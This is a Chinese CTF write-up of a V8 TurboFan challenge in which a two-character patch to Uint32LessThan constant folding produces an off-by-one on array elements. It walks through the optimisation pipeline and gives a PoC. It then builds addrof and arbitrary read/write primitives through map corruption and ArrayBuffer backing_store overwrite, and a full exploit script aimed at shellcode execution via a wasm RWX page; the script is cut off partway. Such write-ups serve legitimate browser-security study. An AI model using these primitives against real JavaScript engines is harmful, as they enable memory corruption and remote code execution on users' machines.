一个两字节patch导致的off-by-one,最终造成类型混淆,执行shellcode。
编译了一个d8程序用于验证和利用漏洞,相关附件下载
CheckBound优化流程
首先在原有的simplified-lowering阶段,CheckBound节点并不被消除,而是设置为kAbortOnOutOfBounds模式,并替换为CheckedUint32Bounds。
void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) { CheckParameters const& p = CheckParametersOf(node->op()); Type const index_type = TypeOf(node->InputAt(0)); Type const length_type = TypeOf(node->InputAt(1)); if (length_type.Is(Type::Unsigned31())) { if (index_type.Is(Type::Integral32OrMinusZero())) { // Map -0 to 0, and the values in the [-2^31,-1] range to the // [2^31,2^32-1] range, which will be considered out-of-bounds // as well, because the {length_type} is limited to Unsigned31. VisitBinop(node, UseInfo::TruncatingWord32(), MachineRepresentation::kWord32); if (lower()) { CheckBoundsParameters::Mode mode = CheckBoundsParameters::kDeoptOnOutOfBounds; if (lowering->poisoning_level_ == PoisoningMitigationLevel::kDontPoison && (index_type.IsNone() || length_type.IsNone() || (index_type.Min() >= 0.0 && index_type.Max() < length_type.Min()))) { // The bounds check is redundant if we already know that // the index is within the bounds of [0.0, length[. mode = CheckBoundsParameters::kAbortOnOutOfBounds; } NodeProperties::ChangeOp( node, simplified()->CheckedUint32Bounds(p.feedback(), mode)); } }
而在此之前,该位置如下,可见原先利用节点消除的漏洞利用方法不能使用了。
if (lower()) { if (lowering->poisoning_level_ == PoisoningMitigationLevel::kDontPoison && (index_type.IsNone() || length_type.IsNone() || (index_type.Min() >= 0.0 && index_type.Max() < length_type.Min()))) { // The bounds check is redundant if we already know that // the index is within the bounds of [0.0, length[. DeferReplacement(node, node->InputAt(0)); } else { NodeProperties::ChangeOp( node, simplified()->CheckedUint32Bounds(p.feedback())); } }
在Effect linearization阶段,CheckedUint32Bounds节点会被优化成Uint32LessThan,并绑定上其True和False分支。
Node* EffectControlLinearizer::LowerCheckedUint32Bounds(Node* node, Node* frame_state) { Node* index = node->InputAt(0); Node* limit = node->InputAt(1); const CheckBoundsParameters& params = CheckBoundsParametersOf(node->op()); Node* check = __ Uint32LessThan(index, limit); switch (params.mode()) { case CheckBoundsParameters::kDeoptOnOutOfBounds: __ DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds, params.check_parameters().feedback(), check, frame_state, IsSafetyCheck::kCriticalSafetyCheck); break; case CheckBoundsParameters::kAbortOnOutOfBounds: { auto if_abort = __ MakeDeferredLabel(); auto done = __ MakeLabel(); __ Branch(check, &done, &if_abort); __ Bind(&if_abort); __ Unreachable(); __ Goto(&done); __ Bind(&done); break; } } return index; }
而在lateoptimize阶段,将其优化为左值<右值这个表达式,即一个永真或者永假条件。
// Perform constant folding and strength reduction on machine operators. Reduction MachineOperatorReducer::Reduce(Node* node) { switch (node->opcode()) { // [...] case IrOpcode::kUint32LessThan: { Uint32BinopMatcher m(node); if (m.left().Is(kMaxUInt32)) return ReplaceBool(false); // M < x => false if (m.right().Is(0)) return ReplaceBool(false); // x < 0 => false if (m.IsFoldable()) { // K < K => K return ReplaceBool(m.left().Value() < m.right().Value()); } if (m.LeftEqualsRight()) return ReplaceBool(false); // x < x => false if (m.left().IsWord32Sar() && m.right().HasValue()) { Int32BinopMatcher mleft(m.left().node()); if (mleft.right().HasValue()) { // (x >> K) < C => x < (C << K) // when C < (M >> K) const uint32_t c = m.right().Value(); const uint32_t k = mleft.right().Value() & 0x1F; if (c < static_cast<uint32_t>(kMaxInt >> k)) { node->ReplaceInput(0, mleft.left().node()); node->ReplaceInput(1, Uint32Constant(c << k)); return Changed(node); } // TODO(turbofan): else the comparison is always true. } } break; }
此后,另一个分支就变成了一个不可达的分支,最终在brancheliminate中被剪掉,达到和早期未patch版本同样的目的,但要求多了很多。
题目分析
而从题目来看,题目只patch了两个字符,就是在上面
return ReplaceBool(m.left().Value() < m.right().Value());
改为了
return ReplaceBool(m.left().Value() < m.right().Value() + 1);
这样的话,就算达到访问一个element的下一个节点,这个checkBound也会被优化掉,从而有个off-by-one,如果能达到这一点,就和*ctf 2019的oob这题一模一样了,但那题的实现是增加了一个builtin函数,不需要利用优化,而此题需要在优化的前提下才能用,而且必须使CheckBound达到上述代码的位置。
测试样例分析
测试代码:
var opt_me2 = () => { let arr = [1,2,3,4]; index = 4; return arr[index]; }; for (var i = 0; i < 0x10000; ++i) opt_me2();
可以发现使用上述测试样例并不能触发OOB,其原因也十分有趣,同样来源于优化过程。
首先通过--trace-turbo对优化过程的IR进行记录,发现在LoopPeeling阶段,44节点是一个值比较结点,而47结点是从element中读取数据,也就是实际执行arr[index]的这个节点。
但在下一阶段loadelimination中,比较44和47两个节点都消失了,最终结果将返回2结点(undefined)。
可以查看一下loadelimination都做了什么,从源码中可以看到主要以AddReducer方法添加了10个reducer
void Run(PipelineData* data, Zone* temp_zone) { GraphReducer graph_reducer(temp_zone, data->graph(), &data->info()->tick_counter(), data->jsgraph()->Dead()); BranchElimination branch_condition_elimination(&graph_reducer, data->jsgraph(), temp_zone); DeadCodeElimination dead_code_elimination(&graph_reducer, data->graph(), data->common(), temp_zone); RedundancyElimination redundancy_elimination(&graph_reducer, temp_zone); LoadElimination load_elimination(&graph_reducer, data->jsgraph(), temp_zone); CheckpointElimination checkpoint_elimination(&graph_reducer); ValueNumberingReducer value_numbering(temp_zone, data->graph()->zone()); CommonOperatorReducer common_reducer(&graph_reducer, data->graph(), data->broker(), data->common(), data->machine(), temp_zone); TypedOptimization typed_optimization(&graph_reducer, data->dependencies(), data->jsgraph(), data->broker()); ConstantFoldingReducer constant_folding_reducer( &graph_reducer, data->jsgraph(), data->broker()); TypeNarrowingReducer type_narrowing_reducer(&graph_reducer, data->jsgraph(), data->broker()); AddReducer(data, &graph_reducer, &branch_condition_elimination); AddReducer(data, &graph_reducer, &dead_code_elimination); AddReducer(data, &graph_reducer, &redundancy_elimination); AddReducer(data, &graph_reducer, &load_elimination); AddReducer(data, &graph_reducer, &type_narrowing_reducer); AddReducer(data, &graph_reducer, &constant_folding_reducer); AddReducer(data, &graph_reducer, &typed_optimization); AddReducer(data, &graph_reducer, &checkpoint_elimination); AddReducer(data, &graph_reducer, &common_reducer); AddReducer(data, &graph_reducer, &value_numbering); graph_reducer.ReduceGraph(); }
而在graph_reducer.ReduceGraph中将分别对每个节点调用上述添加的10个*::Reduce()方法。
Reduction GraphReducer::Reduce(Node* const node) { auto skip = reducers_.end(); for (auto i = reducers_.begin(); i != reducers_.end();) { if (i != skip) { tick_counter_->DoTick(); Reduction reduction = (*i)->Reduce(node); if (!reduction.Changed()) { // No change from this reducer. } else if (reduction.replacement() == node) { // {replacement} == {node} represents an in-place reduction. Rerun // all the other reducers for this node, as now there may be more // opportunities for reduction. if (FLAG_trace_turbo_reduction) { StdoutStream{} << "- In-place update of " << *node << " by reducer " << (*i)->reducer_name() << std::endl; } skip = i; i = reducers_.begin(); continue; } else { // {node} was replaced by another node. if (FLAG_trace_turbo_reduction) { StdoutStream{} << "- Replacement of " << *node << " with " << *(reduction.replacement()) << " by reducer " << (*i)->reducer_name() << std::endl; } return reduction; } } ++i; } if (skip == reducers_.end()) { // No change from any reducer. return Reducer::NoChange(); } // At least one reducer did some in-place reduction. return Reducer::Changed(node); }
使用trace-turbo-reduction对节点的修改和替换细节进行分析,可以发现在如下部分,首先是NumberLessThan(43, 16)内容被TypeNarrowingReducer更新,然后被ConstantFoldingReducer替换成HeapConstant固定值false,最终导致45节点True的分支变成不可达的节点,最终被DeadCodeElimination清理掉,造成没有触发OOB
- In-place update of 44: NumberLessThan(43, 16) by reducer TypeNarrowingReducer - Replacement of 44: NumberLessThan(43, 16) with 55: HeapConstant[0x210c2b740709 <false>] by reducer ConstantFoldingReducer - In-place update of 45: Branch[True|CriticalSafetyCheck](55, 12) by reducer BranchElimination - Replacement of 45: Branch[True|CriticalSafetyCheck](55, 12) with 70: Dead by reducer CommonOperatorReducer - Replacement of 47: LoadElement[tagged base, 16, Signed32, kRepTaggedSigned|kTypeInt32, FullWriteBarrier](59, 43, 43, 70) with 70: Dead by reducer DeadCodeElimination
首先跟踪TypeNarrowingReducer,可以看到当opcode是kNumberLessThan时,如果左节点的最小值大于右节点的最大值时,类型会被op_typer_.singleton_false();,是一个HeapConstant
Reduction TypeNarrowingReducer::Reduce(Node* node) { DisallowHeapAccess no_heap_access; Type new_type = Type::Any(); switch (node->opcode()) { case IrOpcode::kNumberLessThan: { // TODO(turbofan) Reuse the logic from typer.cc (by integrating relational // comparisons with the operation typer). Type left_type = NodeProperties::GetType(node->InputAt(0)); Type right_type = NodeProperties::GetType(node->InputAt(1)); if (left_type.Is(Type::PlainNumber()) && right_type.Is(Type::PlainNumber())) { if (left_type.Max() < right_type.Min()) { new_type = op_typer_.singleton_true(); } else if (left_type.Min() >= right_type.Max()) { new_type = op_typer_.singleton_false(); } } break; } //[...] Type original_type = NodeProperties::GetType(node); Type restricted = Type::Intersect(new_type, original_type, zone()); if (!original_type.Is(restricted)) { NodeProperties::SetType(node, restricted); return Changed(node); } return NoChange(); }
从日志中可以发现其左节点是43,从IR可以发现其范围是[4,4],右节点是16 ,是一个常量值[4]
- Replacement of 41: LoadField[tagged base, 24, Range(0, 134217726), kRepTaggedSigned|kTypeInt32, NoWriteBarrier, mutable](68, 17, 12) with 16: NumberConstant[4] by reducer LoadElimination
因此,在ConstantFoldingReducer::Reduce中,44节点将被生成的一个HeapConstant节点替代。
Reduction ConstantFoldingReducer::Reduce(Node* node) { DisallowHeapAccess no_heap_access; // Check if the output type is a singleton. In that case we already know the // result value and can simply replace the node if it's eliminable. if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) && node->op()->HasProperty(Operator::kEliminatable)) { // TODO(v8:5303): We must not eliminate FinishRegion here. This special // case can be removed once we have separate operators for value and // effect regions. if (node->opcode() == IrOpcode::kFinishRegion) return NoChange(); // We can only constant-fold nodes here, that are known to not cause any // side-effect, may it be a JavaScript observable side-effect or a possible // eager deoptimization exit (i.e. {node} has an operator that doesn't have // the Operator::kNoDeopt property). Type upper = NodeProperties::GetType(node); if (!upper.IsNone()) { Node* replacement = nullptr; if (upper.IsHeapConstant()) { replacement = jsgraph()->Constant(upper.AsHeapConstant()->Ref()); //[...] if (replacement) { // Make sure the node has a type. if (!NodeProperties::IsTyped(replacement)) { NodeProperties::SetType(replacement, upper); } ReplaceWithValue(node, replacement); return Changed(replacement); } } } return NoChange(); }
因此,想要触发OOB必须规避掉以上路径。可以从43节点和16节点两方面考虑。首先说16节点,其来自于41节点的优化
- In-place update of 41: LoadField[tagged base, 24, Range(0, 134217726), kRepTaggedSigned|kTypeInt32, NoWriteBarrier, mutable](68, 17, 12) by reducer RedundancyElimination - Replacement of 41: LoadField[tagged base, 24, Range(0, 134217726), kRepTaggedSigned|kTypeInt32, NoWriteBarrier, mutable](68, 17, 12) with 16: NumberConstant[4] by reducer LoadElimination
当op搜索的参数field_index不是0时,到相应的object中找到相关偏移的节点代替掉这个LoadField节点,可见这个就是直接取出了要访问element的长度,似乎无法改变。
Reduction LoadElimination::ReduceLoadField(Node* node, FieldAccess const& access) { Node* object = NodeProperties::GetValueInput(node, 0); Node* effect = NodeProperties::GetEffectInput(node); Node* control = NodeProperties::GetControlInput(node); AbstractState const* state = node_states_.Get(effect); if (state == nullptr) return NoChange(); if (access.offset == HeapObject::kMapOffset && //[...] } else { int field_index = FieldIndexOf(access); if (field_index >= 0) { PropertyConstness constness = access.constness; MachineRepresentation representation = access.machine_type.representation(); FieldInfo const* lookup_result = state->LookupField(object, field_index, constness); if (!lookup_result && constness == PropertyConstness::kConst) { lookup_result = state->LookupField(object, field_index, PropertyConstness::kMutable); } if (lookup_result) { // Make sure we don't reuse values that were recorded with a different // representation or resurrect dead {replacement} nodes. Node* replacement = lookup_result->value; if (IsCompatible(representation, lookup_result->representation) && !replacement->IsDead()) { // Introduce a TypeGuard if the type of the {replacement} node is not // a subtype of the original {node}'s type. if (!NodeProperties::GetType(replacement) .Is(NodeProperties::GetType(node))) { Type replacement_type = Type::Intersect( NodeProperties::GetType(node), NodeProperties::GetType(replacement), graph()->zone()); replacement = effect = graph()->NewNode(common()->TypeGuard(replacement_type), replacement, effect, control); NodeProperties::SetType(replacement, replacement_type); } ReplaceWithValue(node, replacement, effect); return Replace(replacement); } } FieldInfo info(node, access.name, representation); state = state->AddField(object, field_index, info, constness, zone()); } } Handle<Map> field_map; if (access.map.ToHandle(&field_map)) { state = state->SetMaps(node, ZoneHandleSet<Map>(field_map), zone()); } return UpdateState(node, state); }
而另一节点43 typer的路径如下:
Reduction Reduce(Node* node) override { if (node->op()->ValueOutputCount() == 0) return NoChange(); switch (node->opcode()) { #define DECLARE_CASE(x) \ case IrOpcode::k##x: \ return UpdateType(node, TypeBinaryOp(node, x##Typer)); JS_SIMPLE_BINOP_LIST(DECLARE_CASE) #undef DECLARE_CASE #define DECLARE_CASE(x) \ case IrOpcode::k##x: \ return UpdateType(node, Type##x(node)); DECLARE_CASE(Start) DECLARE_CASE(IfException) // VALUE_OP_LIST without JS_SIMPLE_BINOP_LIST: COMMON_OP_LIST(DECLARE_CASE) SIMPLIFIED_COMPARE_BINOP_LIST(DECLARE_CASE) SIMPLIFIED_OTHER_OP_LIST(DECLARE_CASE) // [here]
SIMPLIFIED_OTHER_OP_LIST定义如下
#define SIMPLIFIED_OTHER_OP_LIST(V) \ // [...] V(CheckBounds) \ V(CheckIf) \
因此这个分支就变成了
case IrOpcode::kCheckBounds: \ return UpdateType(node, TypeCheckBounds(node));
TypeCheckBounds定义如下,取第一个和第二个输入节点的类型,调用CheckBounds
Type Typer::Visitor::TypeCheckBounds(Node* node) { return typer_->operation_typer_.CheckBounds(Operand(node, 0), Operand(node, 1)); }
CheckBounds定义如下,显然index是一个实际的范围,而length负责控制其最大边界,而最终取index与mask的交集。
Type OperationTyper::CheckBounds(Type index, Type length) { DCHECK(length.Is(cache_->kPositiveSafeInteger)); if (length.Is(cache_->kSingletonZero)) return Type::None(); Type mask = Type::Range(0.0, length.Max() - 1, zone()); if (index.Maybe(Type::MinusZero())) { index = Type::Union(index, cache_->kSingletonZero, zone()); } return Type::Intersect(index, mask, zone()); }
Type Type::Intersect(Type type1, Type type2, Zone* zone) { // Fast case: bit sets. if (type1.IsBitset() && type2.IsBitset()) { return NewBitset(type1.AsBitset() & type2.AsBitset()); } // Fast case: top or bottom types. if (type1.IsNone() || type2.IsAny()) return type1; // Shortcut. if (type2.IsNone() || type1.IsAny()) return type2; // Shortcut. // Semi-fast case. if (type1.Is(type2)) return type1; if (type2.Is(type1)) return type2; // Slow case: create union. // Semantic subtyping check - this is needed for consistency with the // semi-fast case above. if (type1.Is(type2)) { type2 = Any(); } else if (type2.Is(type1)) { type1 = Any(); } bitset bits = type1.BitsetGlb() & type2.BitsetGlb(); int size1 = type1.IsUnion() ? type1.AsUnion()->Length() : 1; int size2 = type2.IsUnion() ? type2.AsUnion()->Length() : 1; int size; if (base::bits::SignedAddOverflow32(size1, size2, &size)) return Any(); if (base::bits::SignedAddOverflow32(size, 2, &size)) return Any(); UnionType* result = UnionType::New(size, zone); size = 0; // Deal with bitsets. result->Set(size++, NewBitset(bits)); RangeType::Limits lims = RangeType::Limits::Empty(); size = IntersectAux(type1, type2, result, size, &lims, zone); // If the range is not empty, then insert it into the union and // remove the number bits from the bitset. if (!lims.IsEmpty()) { size = UpdateRange(Type::Range(lims, zone), result, size, zone); // Remove the number bits. bitset number_bits = BitsetType::NumberBits(bits); bits &= ~number_bits; result->Set(0, NewBitset(bits)); } return NormalizeUnion(result, size, zone); }
对于测试demo,其0、1两个节点的范围如下:
显然就是取[4,4]和[0,2147483646]的交集,因此CheckBounds的typer结果是[4,4]。最终导致满足uintlessthan的优化条件left_type.Min() >= right_type.Max(),被优化成永假。
poc构造
综上,分析了测试样例不能触发OOB的原因,首先要想办法绕过loadelimination阶段对loadelement节点的消除。
可以发现一个显然的途径是在CheckBounds的typer阶段做文章,如果让CheckBounds节点的范围并非单一值而是一个范围,保证最小值小于要访问element的范围,就不会满足消除的条件(left_type.Min() >= right_type.Max()),而核心问题是对第一个输入的节点范围的扩展,因为CheckBounds的范围基本由此确定。
长亭发表的一篇writeup中提到了两种解决方案,第一种是对index增加一个and操作idx &= 0xfff;,这种方法会在原来NumberConstant[4]下面增加一个SpeculativeNumberBitwiseAnd节点。
而这个节点的typer实现如下:
Type OperationTyper::NumberBitwiseAnd(Type lhs, Type rhs) { DCHECK(lhs.Is(Type::Number())); DCHECK(rhs.Is(Type::Number())); lhs = NumberToInt32(lhs); rhs = NumberToInt32(rhs); if (lhs.IsNone() || rhs.IsNone()) return Type::None(); double lmin = lhs.Min(); double rmin = rhs.Min(); double lmax = lhs.Max(); double rmax = rhs.Max(); double min = kMinInt; // And-ing any two values results in a value no larger than their maximum. // Even no larger than their minimum if both values are non-negative. double max = lmin >= 0 && rmin >= 0 ? std::min(lmax, rmax) : std::max(lmax, rmax); // And-ing with a non-negative value x causes the result to be between // zero and x. if (lmin >= 0) { min = 0; max = std::min(max, lmax); } if (rmin >= 0) { min = 0; max = std::min(max, rmax); } return Type::Range(min, max, zone()); }
其中lmin、lmax为255,rmin、rmax为4,因此最终该节点的范围(0,4),传递至CheckBounds节点并不满足这消除条件,可以触发漏洞。
第二种,由于逃逸分析阶段在LoadElimination后一阶段,因此在typer时,无法直接分析出从array中取出的index具体值,只能将其分析为Signed32,最终CheckBounds的范围为(0,2147483646)
此外,还可以利用Phi节点来达到同样的目的,当某个值存在分支时,Turbofan会将增加一个phi节点,并将这两个值都加入节点的范围去传递,那么poc同样可以这样构造
var opt_me = (x) => { let arr = [1,2,3,4.1]; let index = 0; if(x = 'p4nda') index = 4; return arr[index]; }; for (var i = 0; i < 0x10000; ++i) opt_me('test'); console.log(opt_me('p4nda'));
则构造的IR图如下
执行结果如下:
# p4nda @ ubuntu in ~/chromium/v8/v8/out.gn/x64.debug/log on git:749f0727a2 x [10:39:33] C:130
$ ../d8 ./test.js
-1.1885946300594787e+148
addrof原语构造
现在在element上存在一个off-by-one。对于一个JSArray,其数据结构本身与element内存分布存在两种布局,一种是elememt在低地址,一般用var a = [1.1,1.2,1.3]这样的方式构建;另一种是element在高地址,一般用var a = Array(4)这样的方式构建。由于二者内存位置紧邻,因此,可以通过off-by-one泄露或者修改一个对象的map地址,从而造成type confuse。
一个简单的想法就是将一个存放了obj的JSArray的map改为全部存放double类型的JSArray map。
首先泄露比较简单,利用之前的poc可以将arr的map,并将arr加入一个全局的Array防止map被释放。
function get_map_opt(x){ let arr = [1.1,1.2,1.3,1.4]; let arr_ele = [arr,arr,arr,arr]; let index = 0; if(x = 'p4nda'){index = 4;} return [arr[index],arr,arr_ele]; } function get_map(){ var tmp ; for(var i = 0; i< 10000;i++){ tmp = get_map_opt('test'); } double_map = tmp[0]; element_map =Add(Int64.fromDouble(double_map), 0xa0).asDouble(); global_var.push(tmp[1]); global_var.push(tmp[2]); } get_map();
在拿到了一个PACKED_DOUBLE_ELEMENTS类型的map时,就可以对一个PACKED_ELEMENTS类型的JSArray造类型混淆了。这里有一个坑点,就是不能对一个PACKED_ELEMENTS类型的map位置直接写一个double,因为element一共有三种类型,并且是不可逆的改变,向PACKED_ELEMENTS类型的element写double会将double转换为一个HeapNumber,也是一个HeapObject,而非double值本身。
例如:
# p4nda @ ubuntu in ~/chromium/v8/v8/out.gn/x64.debug on git:749f0727a2 x [10:26:24] $ cat ./log/test.js let a = [1.1,1.2]; let b = [1,2]; let c = [a,b]; %DebugPrint(c); c[0] = 1.1; %DebugPrint(c); # p4nda @ ubuntu in ~/chromium/v8/v8/out.gn/x64.debug on git:749f0727a2 x [10:26:37] $ ./d8 --allow-natives-syntax ./log/test.js DebugPrint: 0x39d386b0b441: [JSArray] - map: 0x2bd1746c3069 <Map(PACKED_ELEMENTS)> [FastProperties] - prototype: 0x2e535e811859 <JSArray[0]> - elements: 0x39d386b0b421 <FixedArray[2]> [PACKED_ELEMENTS] - length: 2 - properties: 0x1c1fd9680c21 <FixedArray[0]> { #length: 0x2c68462c01a9 <AccessorInfo> (const accessor descriptor) } - elements: 0x39d386b0b421 <FixedArray[2]> { 0: 0x39d386b0b3e1 <JSArray[2]> 1: 0x39d386b0b401 <JSArray[2]> } DebugPrint: 0x39d386b0b441: [JSArray] - map: 0x2bd1746c3069 <Map(PACKED_ELEMENTS)> [FastProperties] - prototype: 0x2e535e811859 <JSArray[0]> - elements: 0x39d386b0b421 <FixedArray[2]> [PACKED_ELEMENTS] - length: 2 - properties: 0x1c1fd9680c21 <FixedArray[0]> { #length: 0x2c68462c01a9 <AccessorInfo> (const accessor descriptor) } - elements: 0x39d386b0b421 <FixedArray[2]> { 0: 0x2e535e81f8a9 <HeapNumber 1.1> 1: 0x39d386b0b401 <JSArray[2]> }
因此需要做一下转换,对一个写满double_map的JSArray(PACKED_DOUBLE_ELEMEMTS类型)造类型混淆,使其混淆为PACKED_ELEMENT类型,这样再去其中的一个变量向PACKED_ELEMENT类型的JSArray写入,即可将其混淆为PACKED_DOUBLE_ELEMENT类型,从而读出其中object的地址。
function prepare_double_map_opt(x){ let arr = [double_map,double_map,double_map,double_map]; let index = 0; if(x = 'p4nda'){index = 4;} arr[index] = element_map; return arr; } function prepare_double_map(){ var tmp; for (var i = 0; i< 10000;i++){ tmp = prepare_double_map_opt(); } return tmp[1]; } double_map_obj = prepare_double_map(); function addrof_opt(obj){ var a = [obj, obj, obj, obj]; let index = 0; if(x = 'p4nda'){index = 4}; a[index] = double_map_obj; return a; } function addrof(obj){ for(var i = 0;i<100000;i++){ var a = addrof_opt(obj); } return a[0]; }
任意地址读写构造
JSArray数据可以存放于三个位置,以数字下标访问的存放于elements,以value:key访问的如果是初始化的时定义的,直接存于数据结构中,其余后续加入的存于properties,而对于键值对访问的数据,其键值查找方式存于map中,那么如果可以对一个JSArray的map进行修改,通过键值对访问的方式,对后续数据进行修改。
首先,获取一个含有properties很多的一个JSArray的map,
function get_array_map_opt(x){ let a = Array(2); a[0] = 1.1; a[1] = 1.2; let b = {a0:1.1 , a1:1.1 , a2:1.1 , a3:1.1 , a4:1.1 , a5:1.1 , a6:1.1 , a7:1.1 , a8:1.1 , a9:1.1 , a10:1.1 , a11:1.1 , a12:1.1 , a13:1.1 , a14:1.1 , a15:1.1 , a16:1.1 , a17:1.1 , a18:1.1 , a19:1.1 , a20:1.1 , a21:1.1 , a22:1.1 , a23:1.1 , a24:1.1 , a25:1.1 , a26:1.1 , a27:1.1 , a28:1.1 , a29:1.1}; let index = 0; if(x = 'p4nda'){index = 2;} return [a[index],b]; } function get_array_map(){ for(var i = 0; i< 10000; i++){ var tmp = get_array_map_opt(); } array_map = tmp[0]; global_tmp.push(tmp[1]); } get_array_map();
通过布局使一个JSArrayBuffer恰好处于紧邻一个JSArray的高地址位置,这样将JSArray的map修改为以上map,就可以不断修改backing_store了,由于这个布局相对稳定,因此可以重复使用。
function get_victim_obj_opt(x){ let b = [11.1,1.1]; let index = 0; if (x = 'p4nda'){index = 2;} b[index] = array_map; console.log(b.length); return b; } function get_victim_obj(){ for (var i = 0 ; i < 10000; i++){ var tmp = get_victim_obj_opt(); } victim_arraybuffer = new ArrayBuffer(0x100); victim_jsarray = tmp; } get_victim_obj();
通过访问victim_jsarray.a5实际上读写的是victim_arraybuffer的backing_store成员,通过对victim_arraybuffer读写达到任意地址读写的目的。
最终,通过wasm对象,找到rwx-区域,执行shellcode。
EXP
function gc() { /*fill-up the 1MB semi-space page, force V8 to scavenge NewSpace.*/ for(var i=0;i<((1024 * 1024)/0x10);i++) { var a= new String(); } } function give_me_a_clean_newspace() { /*force V8 to scavenge NewSpace twice to get a clean NewSpace.*/ gc() gc() } let f64 = new Float64Array(1); let u32 = new Uint32Array(f64.buffer); function d2u(v) { f64[0] = v; return u32; } function u2d(lo, hi) { u32[0] = lo; u32[1] = hi; return f64; } function hex(b) { return ('0' + b.toString(16)).substr(-2); } // Return the hexadecimal representation of the given byte array. function hexlify(bytes) { var res = []; for (var i = 0; i < bytes.length; i++) res.push(hex(bytes[i])); return res.join(''); } // Return the binary data represented by the given hexdecimal string. function unhexlify(hexstr) { if (hexstr.length % 2 == 1) throw new TypeError("Invalid hex string"); var bytes = new Uint8Array(hexstr.length / 2); for (var i = 0; i < hexstr.length; i += 2) bytes[i/2] = parseInt(hexstr.substr(i, 2), 16); return bytes; } function hexdump(data) { if (typeof data.BYTES_PER_ELEMENT !== 'undefined') data = Array.from(data); var lines = []; for (var i = 0; i < data.length; i += 16) { var chunk = data.slice(i, i+16); var parts = chunk.map(hex); if (parts.length > 8) parts.splice(8, 0, ' '); lines.push(parts.join(' ')); } return lines.join('\n'); } // Simplified version of the similarly named python module. var Struct = (function() { // Allocate these once to avoid unecessary heap allocations during pack/unpack operations. var buffer = new ArrayBuffer(8); var byteView = new Uint8Array(buffer); var uint32View = new Uint32Array(buffer); var float64View = new Float64Array(buffer); return { pack: function(type, value) { var view = type; // See below view[0] = value; return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT); }, unpack: function(type, bytes) { if (bytes.length !== type.BYTES_PER_ELEMENT) throw Error("Invalid bytearray"); var view = type; // See below byteView.set(bytes); return view[0]; }, // Available types. int8: byteView, int32: uint32View, float64: float64View }; })(); // // Tiny module that provides big (64bit) integers. // // Copyright (c) 2016 Samuel Groß // // Requires utils.js // // Datatype to represent 64-bit integers. // // Internally, the integer is stored as a Uint8Array in little endian byte order. function Int64(v) { // The underlying byte array. var bytes = new Uint8Array(8); switch (typeof v) { case 'number': v = '0x' + Math.floor(v).toString(16); case 'string': if (v.startsWith('0x')) v = v.substr(2); if (v.length % 2 == 1) v = '0' + v; var bigEndian = unhexlify(v, 8); bytes.set(Array.from(bigEndian).reverse()); break; case 'object': if (v instanceof Int64) { bytes.set(v.bytes()); } else { if (v.length != 8) throw TypeError("Array must have excactly 8 elements."); bytes.set(v); } break; case 'undefined': break; default: throw TypeError("Int64 constructor requires an argument."); } // Return a double whith the same underlying bit representation. this.asDouble = function() { // Check for NaN if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe)) throw new RangeError("Integer can not be represented by a double"); return Struct.unpack(Struct.float64, bytes); }; // Return a javascript value with the same underlying bit representation. // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000) // due to double conversion constraints. this.asJSValue = function() { if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff)) throw new RangeError("Integer can not be represented by a JSValue"); // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern. this.assignSub(this, 0x1000000000000); var res = Struct.unpack(Struct.float64, bytes); this.assignAdd(this, 0x1000000000000); return res; }; // Return the underlying bytes of this number as array. this.bytes = function() { return Array.from(bytes); }; // Return the byte at the given index. this.byteAt = function(i) { return bytes[i]; }; // Return the value of this number as unsigned hex string. this.toString = function() { return '0x' + hexlify(Array.from(bytes).reverse()); }; // Basic arithmetic. // These functions assign the result of the computation to their 'this' object. // Decorator for Int64 instance operations. Takes care // of converting arguments to Int64 instances if required. function operation(f, nargs) { return function() { if (arguments.length != nargs) throw Error("Not enough arguments for function " + f.name); for (var i = 0; i < arguments.length; i++) if (!(arguments[i] instanceof Int64)) arguments[i] = new Int64(arguments[i]); return f.apply(this, arguments); }; } // this = -n (two's complement) this.assignNeg = operation(function neg(n) { for (var i = 0; i < 8; i++) bytes[i] = ~n.byteAt(i); return this.assignAdd(this, Int64.One); }, 1); // this = a + b this.assignAdd = operation(function add(a, b) { var carry = 0; for (var i = 0; i < 8; i++) { var cur = a.byteAt(i) + b.byteAt(i) + carry; carry = cur > 0xff | 0; bytes[i] = cur; } return this; }, 2); // this = a - b this.assignSub = operation(function sub(a, b) { var carry = 0; for (var i = 0; i < 8; i++) { var cur = a.byteAt(i) - b.byteAt(i) - carry; carry = cur < 0 | 0; bytes[i] = cur; } return this; }, 2); } // Constructs a new Int64 instance with the same bit representation as the provided double. Int64.fromDouble = function(d) { var bytes = Struct.pack(Struct.float64, d); return new Int64(bytes); }; // Convenience functions. These allocate a new Int64 to hold the result. // Return -n (two's complement) function Neg(n) { return (new Int64()).assignNeg(n); } // Return a + b function Add(a, b) { return (new Int64()).assignAdd(a, b); } // Return a - b function Sub(a, b) { return (new Int64()).assignSub(a, b); } // Some commonly used numbers. Int64.Zero = new Int64(0); Int64.One = new Int64(1); function utf8ToString(h, p) { let s = ""; for (i = p; h[i]; i++) { s += String.fromCharCode(h[i]); } return s; } let global_var = Array(); let double_map , element_map , double_map_obj , array_map , victim_jsarray,victim_arraybuffer; let global_tmp = []; var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,138,128,128,128,0,2,96,0,1,127,96,1,127,1,127,2,140,128,128,128,0,1,3,101,110,118,4,112,117,116,115,0,1,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,112,52,110,100,97,0,1,10,145,128,128,128,0,1,139,128,128,128,0,1,1,127,65,16,16,0,26,32,0,11,11,150,128,128,128,0,1,0,65,16,11,16,72,97,99,107,101,100,32,98,121,32,80,52,110,100,97,0]); var wasmImports = { env: { puts: function puts (index) { console.log(utf8ToString(h, index)); } } }; let m = new WebAssembly.Instance(new WebAssembly.Module(buffer),wasmImports); let h = new Uint8Array(m.exports.memory.buffer); let f = m.exports.p4nda; console.log("step 0: Game start"); f(); function exploit(){ function get_map_opt(x){ let arr = [1.1,1.2,1.3,1.4]; let arr_ele = [arr,arr,arr,arr]; let index = 0; if(x = 'p4nda'){index = 4;} return [arr[index],arr,arr_ele]; } function get_map(){ var tmp ; for(var i = 0; i< 